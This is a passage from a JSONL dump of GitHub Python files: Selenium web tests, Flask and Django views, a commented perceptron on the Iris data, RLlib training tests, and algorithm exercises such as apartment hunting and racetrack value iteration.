5).until(EC.presence_of_element_located((By.ID, 
'pass'))).send_keys(valid_password)\r\n driver.find_element(By.CSS_SELECTOR, 'button[type=\"submit\"]').click()\r\n\r\n assert driver.find_element(By.TAG_NAME, 'h1').text == 'PetFriends'\r\n\r\n yield\r\n\r\n driver.quit()\r\n\r\n\r\n# явные ожидания, проверка карточек питомцев\r\n\r\ndef test_web_driver_wait(test_driver):\r\n images = WebDriverWait(test_driver, 5).until(\r\n EC.presence_of_all_elements_located((By.CSS_SELECTOR, '.card-img-top'))\r\n )\r\n names = WebDriverWait(test_driver, 5).until(\r\n EC.presence_of_all_elements_located((By.CSS_SELECTOR, '.card-body .card-title'))\r\n )\r\n descriptions = WebDriverWait(test_driver, 5).until(\r\n EC.presence_of_all_elements_located((By.CSS_SELECTOR, '.card-body .card-text'))\r\n )\r\n\r\n src_images = [i.get_attribute('src') for i in images]\r\n text_names = [i.text for i in names]\r\n text_ages = [i.text.split(', ')[1] for i in descriptions]\r\n\r\n assert len(src_images) == len(text_names)\r\n assert len(src_images) == len(text_ages)\r\n\r\n\r\n# неявные ожидания, проверка таблицы питомцев\r\n\r\ndef test_implicitly_wait(test_driver):\r\n test_driver.implicitly_wait(5)\r\n\r\n test_driver.get(f'{base_url}my_pets')\r\n\r\n images = test_driver.find_elements(By.XPATH, '//*[@id=\"all_my_pets\"]/table[1]/tbody[1]/tr[1]/th[1]')\r\n names = test_driver.find_elements(By.XPATH, '//*[@id=\"all_my_pets\"]/table[1]/tbody[1]/tr[1]/td[2]')\r\n ages = test_driver.find_elements(By.XPATH, '//*[@id=\"all_my_pets\"]/table[1]/tbody[1]/tr[1]/td[3]')\r\n\r\n src_images = [i.get_attribute('src') for i in images]\r\n text_names = [i.text for i in names]\r\n text_ages = [i.text for i in ages]\r\n\r\n assert len(src_images) == len(text_names)\r\n assert len(src_images) == len(text_ages)\r\n","repo_name":"dimmycore/selenium_auto_tests","sub_path":"2222.py","file_name":"2222.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35485466231","text":"import pandas as pd\nimport numpy as np\nfrom helper import showMe, getnextid\n\nclass position():\n\tclass metadata():\n\t\tdef __init__(self, id):\n\t\t\tself.id = id\n\t\t\tself.name = 'position-' + str(id)\n\t\t\tself.opendate = None\n\t\t\tself.closedate = None\n\t\t\tself.closetype = None\n\n\tdef __init__(self):\n\t\tself.metadata = self.metadata(getnextid('position'))\n\t\tself.legs = []\n","repo_name":"breath2live/genZero","sub_path":"position.py","file_name":"position.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35472081244","text":"from flask import request, json, Response, Blueprint\nfrom .. models.skills import SkillsModel, SkillsSchema\nfrom .. 
shared.authentication import Auth\n\nskills_api = Blueprint('skills', __name__)\nskills_schema = SkillsSchema()\n\ndef custom_response(res, status_code):\n return Response(\n mimetype = \"application/json\",\n response = json.dumps(res),\n status=status_code\n )\n\n# READ - Gets all skills\n@skills_api.route('/', methods=['GET'])\ndef skills_get_all():\n skills = SkillsModel.get_all_skills()\n ser_data, error = skills_schema.dump(skills, many=True)\n print(type(ser_data))\n print(ser_data)\n return custom_response(ser_data, 200)\n\n# READ - Get 1 skill\n@skills_api.route('/', methods=['GET'])\ndef skills_get_by_id(id):\n post = SkillsModel.get_one_skill(id)\n if not post:\n return custom_response({'error': 'Skill not found'}, 404)\n data, error = skills_schema.dump(post)\n return custom_response(data, 200)\n\n# CREATE - Post new skill to db\n@skills_api.route('/', methods=['POST'])\ndef skills_create():\n\n req_data = request.get_json()\n print(f'req_data = {req_data}')\n\n data, error = skills_schema.load(req_data)\n print(f'data = {data}')\n\n skills = SkillsModel(data)\n skills.save()\n\n ser_data, error = skills_schema.dump(skills)\n print(f'ser_data = {ser_data}')\n return custom_response(ser_data, 201)\n\n# UPDATE - Update an existing skill\n@skills_api.route('/', methods=['PUT'])\ndef skills_update(id):\n req_data = request.get_json()\n skill = SkillsModel.get_one_skill(id)\n\n if not skill:\n return custom_response({'error': 'Skill not found'}, 404)\n\n data, error = skills_schema.dump(skill)\n\n # if data.get('owner_id') != g.user.get('id'):\n # return custom_response({'error': 'Permission Denied'}, 400)\n\n data, error = skills_schema.load(req_data, partial=True)\n\n skill.update(data)\n data, error = skills_schema.dump(skill)\n return custom_response(data, 200)\n\n\n# Delete - Delete skill from User\n@skills_api.route('', methods=['DELETE'])\ndef delete(id):\n post = SkillsModel.get_one_skill(id)\n\n if not post:\n return custom_response({'error': 'Skill not found'}, 404)\n\n data, error = skills_schema.dump(post)\n # if data.get('owner_id') != g.user.get('id'):\n # return custom_response({'error': 'Permission Denied'}, 400)\n\n post.delete()\n return custom_response({'message': 'Deleted'}, 204)\n","repo_name":"cjon2019/CJON_Flask","sub_path":"src/views/skills_view.py","file_name":"skills_view.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70575879787","text":"#########################################################\n### Q1-1 : Iris Classification using Perceptron Class ###\n#########################################################\nimport numpy as np\n\n### Perceptron Class 생성 ###\nclass Perceptron(object):\n\n\t# Perceptron 생성/초기화 함수\n\tdef __init__(self, eta=0.01, n_iter=50, random_state=1):\n\t\t'''\n\t\teta : Learning rate\n\t\tn_iter : Number of Iteration for classification in single NN layer\n\t\trandom_state : Number of perceptrons/neurons used in single NN layer\n\t\t'''\n\t\tself.eta = eta # Learning Rate 선언\n\t\tself.n_iter = n_iter # Regression 반복 횟수 선언\n\t\tself.random_state = random_state # 단일 Perceptron/Neuron에 입력될 Weight를 최초에 몇 개를 랜덤하게 초기화할지 선언 (Seed 선언)\n\n\t# Perceptron의 Regression 함수\n\tdef fit(self, X, y):\n\t\t'''\n\t\tX : Perceptron 입력 데이터 ('데이터셋의 Feature 데이터' 또는 '이전 Layer의 Perceptron에서 전달된 Output')\n\t\ty : 데이터셋의 Label/Target 데이터\n\t\t'''\n\t\trgen = np.random.RandomState(self.random_state)\n\t\t# 사용자가 지정한 개수만큼 Perceptron/Neuron의 Weight의 전체 또는 일부에 
\n\t# Perceptron training (regression) function\n\tdef fit(self, X, y):\n\t\t'''\n\t\tX : Perceptron input data (either the dataset's feature data or the output passed from the perceptrons of the previous layer)\n\t\ty : The dataset's label/target data\n\t\t'''\n\t\trgen = np.random.RandomState(self.random_state)\n\t\t# Random number generator used to create the initial (seed) values for all or part of the perceptron's/neuron's weights\n\t\t# random_state is fixed so that the same sequence of random numbers is produced every run, guaranteeing reproducible initial weights\n\n\t\tself.w_ = rgen.normal(loc=0.0, scale=0.01, size=1 + X.shape[1])\n\t\t# Initialize the input weights (one per feature, plus the bias) with random values drawn from a normal distribution\n\n\t\tself.errors_ = [] # Stores the error count of every training epoch\n\n\t\tfor _ in range(self.n_iter):\n\t\t\terrors = 0\n\t\t\tfor xi, target in zip(X, y):\t# Perform one training pass over the whole dataset\n\t\t\t\t\n\t\t\t\t# Each perceptron weight is updated in proportion to the derivative of the output error/loss with respect to that weight (dL/dw)\n\t\t\t\t# Multiplying this derivative (dL/dw) by the learning rate and adding it to the weight implements gradient descent\n\t\t\t\t\n\t\t\t\t# By the chain rule, dL/dw is the product of\n\t\t\t\t# the derivative of the loss function * the derivative of the activation function * the output of the previous layer (the weighted sum after activation)\n\n\t\t\t\tupdate = self.eta * (target - self.predict(xi))\t\t\n\t\t\t\t# The activation function used by this perceptron is a step function (see the predict function),\n\t\t\t\t# so its derivative is treated as 1 here, and a factor of 1 is used for the activation derivative in the update.\n\t\t\t\t\n\t\t\t\tself.w_[1:] += update * xi\t\n\t\t\t\t# The input weights (the ratios by which the previous neuron's outputs are scaled) are updated cumulatively\n\t\t\t\t# using the input data, the error/loss change with respect to the weights, and the learning rate (weight update by gradient descent)\n\n\t\t\t\tself.w_[0] += update\n\t\t\t\t# The input bias (the amount added to the previous neuron's output) has no input factor, so it is updated cumulatively\n\t\t\t\t# using only the error/loss change and the learning rate (bias update by gradient descent)\n\n\t\t\t\terrors += int(update != 0.0)\t# Accumulate the error count only when the update is nonzero (i.e., when target and prediction disagree)\n\n\n\t\t\tself.errors_.append(errors)\n\n\t\treturn self\n\n\t# Weighted-sum computation of the perceptron\n\tdef net_input(self, X):\n\n\t\treturn np.dot(X, self.w_[1:]) + self.w_[0]\t# Weighted sum via matrix dot product, plus the bias (weight 0)\n\n\t# Prediction function\n\tdef predict(self, X):\n\t\t\t\n\t\t# np.where implements the step activation function\n\t\t# The step function maps a weighted sum of 0 or above to 1 and anything below 0 to -1, producing the perceptron's final output\n\t\treturn np.where(self.net_input(X) >= 0.0, 1, -1)\n\n\n### Training the perceptron on the Iris dataset ###\nimport pandas as pd\n\n# Load the dataset\ndf = pd.read_csv('https://archive.ics.uci.edu/ml/'\n\t\t 'machine-learning-databases/iris/iris.data', header=None)\n\n# Print the last 5 rows of the dataset\nprint(df.tail())\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# Dataset columns 0 ~ 3 : feature data\n# Dataset column 4 : label/target data\ny = df.iloc[0:100, 4].values\t# Extract only the labels/targets (column 4) of rows 0 ~ 99\n\t\t\t\t# Rows 0 ~ 99 of the dataset contain only setosa and versicolor labels\n# Convert the targets to numeric labels so that classification is performed on setosa and versicolor only\ny = np.where(y == 'Iris-setosa', -1, 1)\t# Assign -1 when the label is Iris-setosa\n\t\t\t\t\t# Assign 1 when the label is Iris-versicolor\n\nX = df.iloc[0:100, [0, 2]].values\t# Extract column 0 (sepal length) and column 2 (petal length) of rows 0 ~ 99\n\n# Scatter plot to inspect how the labels are distributed over the feature data\nplt.scatter(X[:50, 0], X[:50, 1], color='red', marker='o', label='setosa')\t\t# Sepal length vs. petal length for the setosa labels (rows 0 ~ 49)\nplt.scatter(X[50:100, 0], X[50:100, 1], color='blue', marker='x', label='versicolor')\t# Sepal length vs. petal length for the versicolor labels (rows 50 ~ 99)\n\nplt.xlabel('sepal length [cm]')\nplt.ylabel('petal length [cm]')\nplt.legend(loc='upper left')\n\nplt.show()\n\n# Prepare and train the perceptron\n\nppn = Perceptron(eta=0.1, n_iter=10)\n# Declare a perceptron with learning rate = 0.1 and 10 training iterations\n\nppn.fit(X, y)\n# Train the perceptron to classify the labels/targets (column 4) using column 0 (sepal length) and\n# column 2 (petal length) of rows 0 ~ 99 of the Iris dataset as features
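\n\n# Note: setosa and versicolor are linearly separable on these two features, so by the\n# perceptron convergence theorem the per-epoch error count plotted below is expected to\n# drop to zero after a finite number of epochs.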
\n\nprint(ppn.errors_)\t# Print the error count of each training iteration\n\nplt.plot(range(1, len(ppn.errors_) + 1), ppn.errors_, marker='o')\t# Plot the error count of every training iteration (epoch)\nplt.xlabel('Epochs')\nplt.ylabel('Number of errors')\n\nplt.show()\n\n### Visualizing the trained perceptron as a decision boundary ###\nfrom matplotlib.colors import ListedColormap\n\ndef plot_decision_boundary(X, y, classifier, resolution=0.02):\n\t# Markers and colormap used to draw each label and region on the plot\n\tmarkers = ('s', 'x', 'o', '^', 'v')\n\tcolors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')\n\tcmap = ListedColormap(colors[:len(np.unique(y))])\t# Each label gets its own color according to its position in the list\n\n\t# Build the decision boundary\n\tx1_min, x1_max = X[:, 0].min() - 1, X[:, 0].max() + 1\t# Range of column 0 of the dataset\n\tx2_min, x2_max = X[:, 1].min() - 1, X[:, 1].max() + 1\t# Range of column 1 of the dataset\n\n\t# Use np.meshgrid to build a 2D grid spanning the ranges of columns 0 and 1\n\txx1, xx2 = np.meshgrid(np.arange(x1_min, x1_max, resolution), np.arange(x2_min, x2_max, resolution))\n\t# Stack the column 0 and column 1 grids column-wise and pass them to the classifier for prediction\n\t# Prediction is performed over the full range of the dataset\n\tZ = classifier.predict(np.array([xx1.ravel(), xx2.ravel()]).T)\n\tZ = Z.reshape(xx1.shape)\t# Reshape the predictions back to the shape of the input grid\n\n\tplt.contourf(xx1, xx2, Z, alpha=0.3, cmap=cmap)\t\n\t# Color the regions split by the decision boundary: blue where the prediction is 1 and red where it is -1\n\tplt.xlim(xx1.min(), xx1.max())\t# Set the x range of the plot\n\tplt.ylim(xx2.min(), xx2.max())\t# Set the y range of the plot\n\n\t# Additionally scatter-plot the predictions for the given Iris dataset\n\tfor idx, cl in enumerate(np.unique(y)):\n\t\tplt.scatter(x=X[y == cl, 0], \n\t\t\t    y=X[y == cl, 1],\n\t\t\t    alpha=0.8, \n\t\t\t    c=colors[idx],\n\t\t\t    marker=markers[idx], \n\t\t\t    label=cl, \n\t\t\t    edgecolor='black')\n\nplot_decision_boundary(X, y, classifier=ppn)\n# Draw the decision boundary of the perceptron's predictions\n\nplt.xlabel('sepal length [cm]')\t\t# x-axis label\nplt.ylabel('petal length [cm]')\t\t# y-axis label\nplt.legend(loc='upper left')\n\nplt.show()\n\n","repo_name":"luwis93choi/ML2020_Class","sub_path":"Assignment_05_Neural_Network/01_pereceptron.py","file_name":"01_pereceptron.py","file_ext":"py","file_size_in_byte":8501,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37226464345","text":"from django.contrib.auth.decorators import login_required\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom blog.models import BlogPost\nfrom django.http import Http404\nfrom .forms import BlogPostForm, BlogPostModelForm\n# Create your views here.\n\n\n# get -> 1 object\n# filter -> set of objects\ndef blog_post_detail_page(request,slug):\n    # if slugs weren't unique:\n    #queryset = BlogPost.objects.filter(slug=slug)\n    #if queryset.count() == 0:\n    #    raise Http404\n    #obj = queryset.first()\n    obj = get_object_or_404(BlogPost, slug=slug)\n    template_name='detail.html'\n    context={'object':obj}\n    return render(request, template_name, context)\n\n\n# CRUD\n\n\ndef blog_post_list_view(request):\n    queryset = BlogPost.objects.all().published() # list of python objects\n    # as search: queryset = BlogPost.objects.filter(title__icontains='something here')\n    if request.user.is_authenticated:\n        myqueryset = 
BlogPost.objects.filter(user=request.user)\n queryset = (queryset | myqueryset).distinct()\n template_name = 'blog/list.html'\n context = {'object_list':queryset}\n return render(request, template_name, context= context)\n\n#@login_required\n@staff_member_required\ndef blog_post_create_view(request):\n form = BlogPostModelForm(request.POST or None, request.FILES or None)\n if form.is_valid():\n print(form.cleaned_data)\n # obj = BlogPost.objects.create(**form.cleaned_data)\n # we can make some changes to our model with commit = False\n obj = form.save(commit=False)\n obj.title = form.cleaned_data.get(\"title\")\n obj.user = request.user\n obj.save()\n form = BlogPostModelForm()\n return redirect(\"/blog\")\n template_name = 'blog/form.html'\n context = {'form':form}\n return render(request, template_name, context= context)\n\n@staff_member_required\ndef blog_post_detail_view(request, slug):\n obj = get_object_or_404(BlogPost, slug=slug)\n template_name='blog/detail.html'\n context={'object':obj}\n return render(request, template_name, context)\n\n@staff_member_required\ndef blog_post_update_view(request,slug):\n obj = get_object_or_404(BlogPost, slug=slug)\n form = BlogPostModelForm(request.POST or None, instance=obj)\n if form.is_valid():\n form.save()\n return redirect(\"/blog\")\n template_name='blog/form.html'\n context={ 'title':f\"Update {obj.title}\",'form':form}\n return render(request, template_name, context)\n\n@staff_member_required\ndef blog_post_delete_view(request,slug):\n obj = get_object_or_404(BlogPost, slug=slug)\n template_name='blog/delete.html'\n if request.method == \"POST\":\n obj.delete()\n return redirect(\"/blog\")\n context={'object':obj}\n return render(request, template_name, context)\n","repo_name":"NimaFathi/BlogPostWebsite","sub_path":"website/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13087945714","text":"import logging\nimport os\nimport pdb\nimport pickle\nimport time\n\nimport numpy as np\nimport scipy\nimport torch\nimport torch.functional as F\nfrom lib.dataset_utils import *\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\n\ndef main():\n\n idx = 1\n TOL = 1e-5\n name = 'test_nb_pca25'\n\n # Get logger\n log_file = name + '.log'\n log = logging.getLogger(name)\n log.setLevel(logging.DEBUG)\n # Create formatter and add it to the handlers\n formatter = logging.Formatter(\n '[%(levelname)s %(asctime)s %(name)s] %(message)s')\n # Create file handler\n fh = logging.FileHandler(log_file, mode='w')\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(formatter)\n log.addHandler(fh)\n log.info(log_file)\n\n (x_train, y_train), (_, _), (_, _) = load_mnist_all(\n data_dir='/data', val_size=0.1, shuffle=True, seed=1)\n points = x_train.view(-1, 784).numpy()\n\n # PCA\n from sklearn.decomposition import PCA\n pca = PCA(n_components=25)\n points = pca.fit_transform(points)\n\n mid = []\n nonmid = []\n nearest_point = np.copy(points[idx])\n points = np.delete(points, idx, axis=0)\n distance = np.zeros(points.shape[0]) - 1\n\n log.info('checking midpoints...')\n start = time.time()\n for i in range(points.shape[0]):\n midpoint = (nearest_point + points[i]) / 2\n dist = ((midpoint - points) ** 2).sum(1)\n min_dist = dist.min()\n min_idx = np.where(dist - min_dist < TOL)[0]\n dist_to_nearest_point = ((midpoint - nearest_point) ** 2).sum()\n if abs(dist_to_nearest_point - 
min_dist) < 1e-12 and i in min_idx and len(min_idx) == 1:\n mid.append(i)\n distance[i] = np.sqrt(min_dist)\n else:\n nonmid.append(i)\n if i % 1000 == 0:\n log.debug(i)\n end = time.time()\n\n log.info('runtime for checking midpoint: %.4fs', end - start)\n log.info('len of mid: %d', len(mid))\n log.info('len of non-mid: %d', len(nonmid))\n\n def get_polytope(points, nearest_point):\n A = np.zeros((points.shape[0], points.shape[1]))\n b = np.zeros(A.shape[0])\n for i in range(A.shape[0]):\n A[i] = points[i] - nearest_point\n b[i] = (A[i] @ (points[i] + nearest_point)) / 2\n return A, b\n\n A, b = get_polytope(points, nearest_point)\n A = A.astype(np.float32)\n b = b.astype(np.float32)\n assert A.shape == points.shape\n\n AAT = A @ A.T\n norm_A = np.diag(AAT)\n d = A.shape[0]\n\n num_steps = 1000\n feas = []\n\n x_hat = nearest_point\n # x_hat = np.zeros(A.shape[1]) + 1\n b_hat = A @ x_hat - b\n\n def objective(lamda):\n return - 0.5 * ((A.T @ lamda) ** 2).sum() + lamda @ b_hat\n\n def cga_update(lamda, g, idx_hp):\n gg = np.maximum(0, lamda + g / norm_A) - lamda\n gg[idx_hp] = g[idx_hp] / norm_A[idx_hp]\n gg_abs = np.abs(gg)\n i_star = gg_abs.argmax()\n lamda[i_star] += gg[i_star]\n g = g - gg[i_star] * AAT[:, i_star]\n return lamda, g, gg_abs\n\n def cga(idx_hp):\n lamda = np.zeros(d)\n g = b_hat\n for step in range(num_steps):\n lamda, g, gg = cga_update(lamda, g, idx_hp)\n if gg.max() < TOL:\n obj = objective(lamda)\n # log.info(obj)\n # log.info(step)\n return obj\n return None\n\n def run_all_hp():\n for i, idx_hp in enumerate(nonmid):\n obj = cga(idx_hp)\n if obj is not None:\n feas.append(idx_hp)\n distance[idx_hp] = np.sqrt(obj * 2)\n if i % 1000 == 0:\n log.debug(i)\n\n log.info('start solving QPs on non-midpoints...')\n start = time.time()\n run_all_hp()\n end = time.time()\n log.info('QP runtime: %.4fs', end - start)\n\n log.info('len of feas: %d', len(feas))\n log.info('number of edges: %d', (len(feas) + len(mid)))\n log.info('number of non-edges: %d', (len(points) - len(feas) - len(mid)))\n\n pickle.dump(distance, open('distance_%s.p' % name, 'wb'))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"wagner-group/geoadex","sub_path":"archived/test_nb.py","file_name":"test_nb.py","file_ext":"py","file_size_in_byte":4116,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"11223899451","text":"import os\nimport logging\nfrom flask import Flask, request, render_template, jsonify\nimport openai\n\napp = Flask(__name__)\n\n# Load your OpenAI API key from the environment variables\nopenai.api_key = os.getenv(\"OPENAI_API_KEY\")\n\n# Set up logging\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/ask', methods=['POST'])\ndef send_question():\n # Get the question from the request data\n data = request.get_json()\n question = data.get('question', '')\n\n # Check if the question is empty\n if not question:\n return jsonify({'error': 'Question is required'}), 400\n\n # Check if the API key is set\n if not openai.api_key:\n logger.error('OpenAI API key is missing or not configured')\n return render_template('index.html', error='OpenAI API key is not configured')\n\n try:\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": \"You are a helpful assistant.\"},\n {\"role\": \"user\", \"content\": question},\n ]\n )\n\n answer = 
response.choices[0].message['content']\n\n # Log the API call and response\n logger.info(f'API Call: question=\"{question}\", answer=\"{answer}\"')\n\n return jsonify({'answer': answer})\n\n except Exception as e:\n logger.error(f'Error: {str(e)}')\n return render_template('index.html', error=str(e)) # Pass the error message to the template\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000)","repo_name":"Manuel-Espinosa/flask-chatgpt-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32625555595","text":"# Solves the apartment hunting problem\n\n\n# O(b) time | O(b) space \ndef get_priority_memo(priority, blocks):\n htbl = dict()\n\n for i in range(len(blocks)):\n if blocks[i][priority]:\n htbl[0] = [i, 'right']\n break\n \n for i in range(1, len(blocks)):\n if blocks[i][priority]:\n htbl[i] = [0, 'self']\n \n elif i+1 < len(blocks) and blocks[i+1][priority]:\n htbl[i] = [1, 'right']\n \n elif blocks[i-1][priority]:\n htbl[i] = [1, 'left']\n \n else:\n temp = htbl[i-1]\n\n if temp[1] == \"left\":\n htbl[i] = [temp[0]+1, \"left\"]\n\n elif temp[1] == \"right\":\n htbl[i] = [temp[0]-1, \"right\"]\n \n return [htbl[i][0] for i in range(len(blocks))]\n\n# O(br) time | O(br) space\ndef apartment_hunting(blocks, priorities):\n priority_memos = [get_priority_memo(priority, blocks) for priority in priorities]\n memo = []\n\n for i in range(len(blocks)):\n memo.append(max([priority_memo[i] for priority_memo in priority_memos]))\n \n return min(enumerate(memo), key=lambda item: item[1])[0]\n\n\nif __name__ == \"__main__\":\n res = apartment_hunting(\n [\n {\n \"gym\": False,\n \"school\": True,\n \"store\": False,\n },\n {\n \"gym\": True,\n \"school\": False,\n \"store\": False,\n },\n {\n \"gym\": True,\n \"school\": True,\n \"store\": False,\n },\n {\n \"gym\": False,\n \"school\": True,\n \"store\": False,\n },\n {\n \"gym\": False,\n \"school\": True,\n \"store\": True,\n },\n ],\n [\"gym\",\"school\",\"store\"]\n )\n\n assert res == 3, res\n\n print(\"You're all set!\")","repo_name":"tobeyOguney/Zoo-of-Algorithms","sub_path":"Apartment Hunting/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"29622826893","text":"def validate(request):\r\n if(request.form == {}):\r\n return [\"False\",\"\"]\r\n name = request.form.get('name')\r\n if(len(name) <=8 or len(name) >=15):\r\n return [\"False\",\"name\"]\r\n mobile =request.form.get('mobile')\r\n mobile = str(mobile)\r\n if(len(mobile) != 10):\r\n return [\"False\",\"mobile\"]\r\n else:\r\n start = mobile[0]\r\n if start not in ['6','7','8','9']:\r\n return [\"False\",'mobile']\r\n return ['True']","repo_name":"sajanlawrence/TCS-Flask-Exam-Prep","sub_path":"TCS Flask Exam Prep/Flask RestFul API/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24422849763","text":"import random\nimport time\n\nimport pytest\n\nfrom effective_horizon.experiments.train import ex as train_ex\nfrom effective_horizon.experiments.train_bc import ex as train_bc_ex\n\n\n@pytest.fixture\ndef random_seed():\n random.seed(time.time_ns())\n\n\n@pytest.mark.uses_rllib\ndef test_pretrain_atari_bc(random_seed, tmp_path):\n run = 
train_bc_ex.run(\n config_updates={\n \"log_dir\": tmp_path / \"logs\",\n \"env_name\": \"BRIDGE/freeway_10_fs30-v0\",\n \"input\": \"data/atari_human_data/rllib_complete_minimal_actions/freeway\",\n \"num_workers\": 0,\n \"entropy_coeff\": 0.1,\n \"num_training_iters\": 10,\n \"train_batch_size\": 100,\n }\n )\n assert run.result is not None\n assert (\n run.result[\"info\"][\"learner\"][\"default_policy\"][\"learner_stats\"][\"bc_loss\"] < 1\n )\n\n\n@pytest.mark.uses_rllib\ndef test_pretrain_procgen(random_seed, tmp_path):\n run = train_ex.run(\n config_updates={\n \"log_dir\": tmp_path / \"logs\",\n \"env_name\": \"procgen\",\n \"procgen_env_name\": \"coinrun\",\n \"run\": \"PPO\",\n \"train_batch_size\": 100,\n \"rollout_fragment_length\": 100,\n \"sgd_minibatch_size\": 100,\n \"num_workers\": 1,\n \"num_sgd_iter\": 1,\n \"num_training_iters\": 1,\n \"entropy_coeff\": 0.1,\n }\n )\n assert run.result is not None\n assert run.result[\"episode_reward_mean\"] >= 0\n\n\n@pytest.mark.uses_rllib\ndef test_train_ppo(random_seed, tmp_path):\n mdp, optimal_reward = random.choice(\n [\n (\"BRIDGE/freeway_10_fs30-v0\", 1),\n (\"BRIDGE/maze_easy_l0_30_fs1-v0\", 10),\n (\"BRIDGE/MiniGrid-KeyCorridorS3R1-v0\", 1),\n ]\n )\n run = train_ex.run(\n config_updates={\n \"log_dir\": tmp_path / \"logs\",\n \"env_name\": mdp,\n \"run\": \"PPO\",\n \"train_batch_size\": 100,\n \"rollout_fragment_length\": 100,\n \"sgd_minibatch_size\": 100,\n \"num_sgd_iter\": 1,\n \"num_workers\": 1,\n \"num_training_iters\": 1,\n \"stop_on_eval_reward\": optimal_reward,\n }\n )\n assert run.result is not None\n assert run.result[\"episode_reward_mean\"] >= 0\n\n\n@pytest.mark.uses_rllib\ndef test_train_dqn(random_seed, tmp_path):\n mdp, optimal_reward = random.choice(\n [\n (\"BRIDGE/freeway_10_fs30-v0\", 1),\n (\"BRIDGE/maze_easy_l0_30_fs1-v0\", 10),\n (\"BRIDGE/MiniGrid-KeyCorridorS3R1-v0\", 1),\n ]\n )\n run = train_ex.run(\n config_updates={\n \"log_dir\": tmp_path / \"logs\",\n \"env_name\": mdp,\n \"run\": \"FastDQN\",\n \"train_batch_size\": 80,\n \"rollout_fragment_length\": 10,\n \"sgd_minibatch_size\": 80,\n \"num_sgd_iter\": 1,\n \"num_workers\": 1,\n \"epsilon_timesteps\": 1000,\n \"dueling\": True,\n \"double_q\": True,\n \"prioritized_replay\": True,\n \"replay_buffer_capacity\": 1000,\n \"learning_starts\": 0,\n \"simple_optimizer\": True,\n \"num_training_iters\": 1,\n \"stop_on_eval_reward\": optimal_reward,\n }\n )\n assert run.result is not None\n assert run.result[\"episode_reward_mean\"] >= 0\n\n\n@pytest.mark.uses_rllib\ndef test_train_gorp(random_seed, tmp_path):\n run = train_ex.run(\n config_updates={\n \"log_dir\": tmp_path / \"logs\",\n \"env_name\": \"atari\",\n \"horizon\": 27000,\n \"frameskip\": 4,\n \"deterministic\": True,\n \"rom_file\": \"pong\",\n \"reward_scale\": 1,\n \"done_on_life_lost\": True,\n \"gamma\": 0.99,\n \"run\": \"GORP\",\n \"episodes_per_action_seq\": 1,\n \"num_training_iters\": 2,\n \"stop_on_timesteps\": 1000,\n }\n )\n assert run.result is not None\n assert run.result[\"episode_reward_mean\"] >= -21\n","repo_name":"cassidylaidlaw/effective-horizon","sub_path":"tests/test_training.py","file_name":"test_training.py","file_ext":"py","file_size_in_byte":3995,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"12393992964","text":"import logging\nimport sys\nimport os\nimport random\nimport time\nimport copy\nimport numpy as np\nfrom random import random\nfrom statistics import mean\n\nfrom data_utils.race_track 
import RaceTrack, RaceCar, Action, State\n\n# Logging stuff\nlog_level = logging.INFO\nLOG = logging.getLogger(__name__)\nLOG.setLevel(log_level)\nhandler = logging.StreamHandler(sys.stdout)\nhandler.setLevel(log_level)\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler.setFormatter(formatter)\nLOG.addHandler(handler)\n\nNUM_RACES = 10\n\n# Class that manages the Value Iteration dynamic programming algorithm for filling out the V values of a RaceCar and\n# setting its acceleration policy.\nclass RaceTrackValueIteration(object):\n\n    # The algorithm needs a RaceTrack, a RaceCar, the learning_rate, the maximum allowed iterations through the state space,\n    # and a boolean to set the crash policy. If True, a crash sets the RaceCar back to the start; if False, a crash places\n    # the racecar at its last non-wall position with zero velocity.\n    def __init__(self, race_track: RaceTrack, race_car: RaceCar, learning_rate: float, max_iterations: int,\n        crash_means_restart: bool\n    ):\n        self.rt = race_track\n        self.rc = race_car\n        self.lr = learning_rate\n        self.mi = max_iterations\n        self.crash_means_restart = crash_means_restart\n\n    # Used to calculate the reward of taking an action at a state. For this model, all actions taken at non-finish-line\n    # spaces have a cost of -1 and all finish line spaces have a cost of 0, making them absorbing states.\n    def reward(self, x, y):\n        if self.rt.track_matrix[y][x] == \"F\":\n            return 0\n        else:\n            return -1\n\n    # Takes a current state in the form of its x and y coordinates, current x velocity, and current y velocity.\n    # It then applies an acceleration action to the state and returns the new state.\n    def calc_action_outcome(self, state_x, state_y, x_velocity, y_velocity, action_x_acc_delta, action_y_acc_delta):\n        # The racecar only applies the acceleration change to its current position and 